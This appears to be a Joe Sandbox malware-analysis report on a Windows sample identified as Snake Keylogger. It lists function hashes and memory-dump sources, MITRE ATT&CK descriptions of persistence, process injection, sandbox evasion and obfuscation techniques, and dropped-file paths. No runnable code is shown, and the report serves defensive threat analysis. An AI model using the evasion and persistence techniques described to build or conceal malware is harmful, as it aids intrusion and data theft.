Opcode ID: 2d613a6065c020378341be4335a1696fb665533e0cc9b5cb43a9cb280b7fcc7d
Instruction ID: 7b286c0f28a430cc01ecdc479f19dcce1e97520c462440fc38bd75b96dda2530
Opcode Fuzzy Hash: 2d613a6065c020378341be4335a1696fb665533e0cc9b5cb43a9cb280b7fcc7d
Instruction Fuzzy Hash: CA51C575E11209CFCB48DFA9D99099DBBF2FF89310B209469E805AB324DB31A942CF50

Function 01259A63 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76910c58121c0856b03974200537b53a1430da783841dbb87ce743333e7cfa1c
Instruction ID: 3b8190ac48eff3e4e834c7387e8118dec6d3734c1a5fea120416b6bfe8cb3d74
Opcode Fuzzy Hash: 76910c58121c0856b03974200537b53a1430da783841dbb87ce743333e7cfa1c
Instruction Fuzzy Hash: 4941D231A14249DFCF12CFA9C884A9DBFB2FF49318F048555ED15AB292D375D990CBA0

Function 01254DC8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df5dbf41632575f793cabd1c06585a1f9ffbcd06b5df0174fdd51e32d83a503a
Instruction ID: 2a7f5e9303301b3e619a9cebe696f0c3cb6aa4f2a48b8ecf6e62f9eac0c56091
Opcode Fuzzy Hash: df5dbf41632575f793cabd1c06585a1f9ffbcd06b5df0174fdd51e32d83a503a
Instruction Fuzzy Hash: 6731D27161814AEFCB05AF69D888AAF7BA2FF88304F004414FE058B341DB34CD65EBA0

Function 012576D0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc74b05edc1a92f8eb30e9dd3eca2252e2e95959f40e5f95daa451d348bab632
Instruction ID: b9cf7568434727f2223133ada20c3255120afab55a92b1164a2fb018dbca18f9
Opcode Fuzzy Hash: bc74b05edc1a92f8eb30e9dd3eca2252e2e95959f40e5f95daa451d348bab632
Instruction Fuzzy Hash: DC21E2353A02024FEB5A163AACD8A793BD79FC861875844A9DE06CB795EE35CC43D3C1

Function 0125A809 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe1704440e5ee4f40ce1ae88f73541be80702e4bc251bb76e02ffdf4e19f501d
Instruction ID: 25a16a454f4f37ac269900fde1e9811f145f427a3744f198bbbffb67b2ff4b9c
Opcode Fuzzy Hash: fe1704440e5ee4f40ce1ae88f73541be80702e4bc251bb76e02ffdf4e19f501d
Instruction Fuzzy Hash: BD319074E001198FCB04CF6DC8CA9AEBBF6BF84310B198659E955973A1CB349C02CB90

Function 012576E0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53dbbd7fdb9f50d8f2f6d51380b065ef9a2c9b489cba57d25cdc5f93a0bd2dfd
Instruction ID: 0f167d3ee3aa5eaaa81619214684cb20a02ae59d3fa37708b08e95d967080460
Opcode Fuzzy Hash: 53dbbd7fdb9f50d8f2f6d51380b065ef9a2c9b489cba57d25cdc5f93a0bd2dfd
Instruction Fuzzy Hash: F021D3343A02024BEB59162AE8D8A3A36979FC4B18F5440B8DE06CB795EE75CC42D3C1

Function 01252060 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2d38c94b5d29b81b77c9e91f82278ca0133e195cbb5abb9e15a0fe69e3aae72
Instruction ID: 09178f8d669e247ec0b2b6b851b9f82c1df6f312c2a797047fcf841517955c04
Opcode Fuzzy Hash: f2d38c94b5d29b81b77c9e91f82278ca0133e195cbb5abb9e15a0fe69e3aae72
Instruction Fuzzy Hash: 7A21E276A10116DFCF54DF38C4809AE37A6EB99364F10C41DD94A9B380DE35EA42CBD2

Function 0125D11A Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0843009ba5008bb450f6dd45b2fcb0f25d37da03c3ee6ea845a135f80f8df9ae
Instruction ID: 81f24b3c2f695e73ca6692e0317cb9cd4e1fb084d51308980b0380dcda53240f
Opcode Fuzzy Hash: 0843009ba5008bb450f6dd45b2fcb0f25d37da03c3ee6ea845a135f80f8df9ae
Instruction Fuzzy Hash: 29211531C11659DECB01EFF8D9456ECFBB0EF4A300F009629E55577254EB706A5ACB40

Function 01255A70 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b6265cbcdd70d1f9d5cdf0f70835d5ecbb4b42ea3691339c962c5bb037355b3
Instruction ID: 2825e0436a4f736bf3646c60456d79a5c7cba76b260a32082be693bda6564bfd
Opcode Fuzzy Hash: 8b6265cbcdd70d1f9d5cdf0f70835d5ecbb4b42ea3691339c962c5bb037355b3
Instruction Fuzzy Hash: D221A131711A129FD7199A2AC8D862BB797EFC8660B154669EE06DB354DE30DC028BC0

Function 01254DB9 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09e28e9cb57af8fefecc76e868472b4a6260d0033d6b4d168f913fc41d8b2d0d
Instruction ID: 32d97a0efac15280bbdb82cfb154f261a97531288c6816ed00d045342171386e
Opcode Fuzzy Hash: 09e28e9cb57af8fefecc76e868472b4a6260d0033d6b4d168f913fc41d8b2d0d
Instruction Fuzzy Hash: 00212631618189DFCB12AF68D8997BB7FA2EF88314F004469F9458B342DA38CD56DBD0

Function 0125D218 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50246531398c2473d0c192199eff7a6c4c1628710a9d781674ad7738902f31ff
Instruction ID: 7cebf85b9857789663f2b114b4a88ec1779d98bba643adf0e17d2eac52eaa441
Opcode Fuzzy Hash: 50246531398c2473d0c192199eff7a6c4c1628710a9d781674ad7738902f31ff
Instruction Fuzzy Hash: 4A212935A45209CFCB05DFB4E851AEDB7B2EF8A300F105928D80273364DB39A982CF65

Function 012539ED Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 219a92b0da1ef7770609b5b77c9840a51be22493f7b38b62001887c095997661
Instruction ID: 63c9c89dd90d32c2ec1e0d245ee14bd4ed80915e67d2b24258fc4a4affdf0c28
Opcode Fuzzy Hash: 219a92b0da1ef7770609b5b77c9840a51be22493f7b38b62001887c095997661
Instruction Fuzzy Hash: 7531A379E11209CFCB44EFA8E5948ADBBF2FF49305B209469E819AB324D731AD45CF50

Function 0125D228 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcd69001122d62de611cf124cb92ebead50d312183c3a85fab3f5e964a1a6344
Instruction ID: ce3f51ad17ce3b214479a3853ff832060662d53aa1ce9d623818c0e41c46bb70
Opcode Fuzzy Hash: fcd69001122d62de611cf124cb92ebead50d312183c3a85fab3f5e964a1a6344
Instruction Fuzzy Hash: 6F210635A41209DFDB08DFB4E851AEDB7B2FB89300F105528D805733A0DB39A981CE65

Function 01255A60 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 970d02146f460edefea74d6b6f08b56940b9b59f63364058a1181d873314d1ab
Instruction ID: c379284baca72c95cbf45a77853f5cb2754ed0885c967ead7a3939e0e3bc6a08
Opcode Fuzzy Hash: 970d02146f460edefea74d6b6f08b56940b9b59f63364058a1181d873314d1ab
Instruction Fuzzy Hash: 39110430715A129FC3194A2AC8E852E7BA3EF8526030945A8EE46CB351DE35DC028B80

Function 01251F61 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac66245ac022ee88dce1a04bc85db5ef12c6abd59206c9f59482224eb0de3a3e
Instruction ID: 7c350cb3e7dbdab3b5e7059a6b11b510837e75f4be7e75b5c12c86df06d35604
Opcode Fuzzy Hash: ac66245ac022ee88dce1a04bc85db5ef12c6abd59206c9f59482224eb0de3a3e
Instruction Fuzzy Hash: 6121C2B4D0160ACFCB40EFA9D9496EEBFF1BF49300F10566AD805B3254EB305A95CBA1

Function 01251F08 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c503f9844e419908f357441188fa21cb47787b13e5df0476bb2d9f731104e09
Instruction ID: 5ffebe9465ac77d5c639d9e825b57e224c30214b24f3479dc4486a5a1948ca6b
Opcode Fuzzy Hash: 9c503f9844e419908f357441188fa21cb47787b13e5df0476bb2d9f731104e09
Instruction Fuzzy Hash: 0B214A74D0560ACFCB01EFA8D8486EDBFF0BF49310F14426AD845B7264EB301A45CBA1

Function 01255607 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25739cf0c38d984e9a057165aa128d857ec6b5b5a6e4c5bc9c5b3d521394762c
Instruction ID: c63fd9ca24cc38ed4c234a8043787a1dfc21ecf4712e11b2649960e7a682aa85
Opcode Fuzzy Hash: 25739cf0c38d984e9a057165aa128d857ec6b5b5a6e4c5bc9c5b3d521394762c
Instruction Fuzzy Hash: A2012871B080456FDB069E69A854AFF3FE7DFC9351B18806AFA05D7290CA76CC1297A0

Function 01252010 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c80032a258a3b4debbaa70fb20d93ca0f72e044ce2b858e67cba7af3087e95e5
Instruction ID: 7b9a74a28c39f490f1623f793a5536412f962fe82146d49c4acc4f99dc75354a
Opcode Fuzzy Hash: c80032a258a3b4debbaa70fb20d93ca0f72e044ce2b858e67cba7af3087e95e5
Instruction Fuzzy Hash: 50E04F71A1022AA7CB019FA5ED045EEB778EF92754F404652D5643B140EB70265A87A2

Function 01252020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b2e16220c9515703722265e1b4ecd164f234b494173f516b114e37cfa2d5584
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: 4b2e16220c9515703722265e1b4ecd164f234b494173f516b114e37cfa2d5584
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 01258258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: c2cbb31dd972bac47b7e51f10b3e04d2ea386f0a7973dd015b893badf0224740
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 8AC0123321C1282AA765208F7C81AA3AB8CC2C12F4A250137FA1CE3201A8929C8001A8

Function 0125A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80c989e5eefcf6c6f424ebcd52cff462b34865118d9497acd5d0055b167f4710
Instruction ID: fdbc65673cb8abaeb9f60cd5ceb788fc0cd672bb5ae077fa16d42c813614e48c
Opcode Fuzzy Hash: 80c989e5eefcf6c6f424ebcd52cff462b34865118d9497acd5d0055b167f4710
Instruction Fuzzy Hash: 2BD0173BB40008DFCB008F89E8408DDB7B6FB9C221B008116EA11A3220C6329821CB90

Function 01255EA8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 166ce42a2bd0269b314cd84b3f1f4239868042e90a1c6472477c2f9a3d1cbe44
Instruction ID: 0f0ae5f6e63e6f72b1620312555bea54b10ddea8c21f8d6496eaf353d9922d77
Opcode Fuzzy Hash: 166ce42a2bd0269b314cd84b3f1f4239868042e90a1c6472477c2f9a3d1cbe44
Instruction Fuzzy Hash: A2D02B3044C785CFC702F735ED551047F256FC1304F4005E0E4440E22BFB7949894B52

Function 01255EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96929f8af0ac9069296bd4ca999aba647af8140c69b1afc5ba9f193d5264d1b8
Instruction ID: a501759e56677b2d6a58fc03300c291dd02caac5a5e4f2e7736ef6ae1c60bc61
Opcode Fuzzy Hash: 96929f8af0ac9069296bd4ca999aba647af8140c69b1afc5ba9f193d5264d1b8
Instruction Fuzzy Hash: F6C01231584309CFC505F777EA45555771EAAC0304F405620B4090632EFF785A884691

Non-executed Functions

Function 01256088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 01256094
\;^q, xrefs: 012560C6
\;^q, xrefs: 012560BA
\;^q, xrefs: 0125609E

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 0b11a5a7ae12cd48cd5662e19e8c16c3145f08237f4733dcf4323571c8318f40
Instruction ID: 7fcb9b4f5f6a245afa2cc585ecd4e8494b9bdd884f1f4514c181798a0de7bce8
Opcode Fuzzy Hash: 0b11a5a7ae12cd48cd5662e19e8c16c3145f08237f4733dcf4323571c8318f40
Instruction Fuzzy Hash: FF01B1317300159FCBA48E2CC48492577FBBF88A60355417AEA02CB3B4DAB2DC41C740

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report VQsnGWaNi5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VQsnGWaNi5.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ywKvCTGbQjXP.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

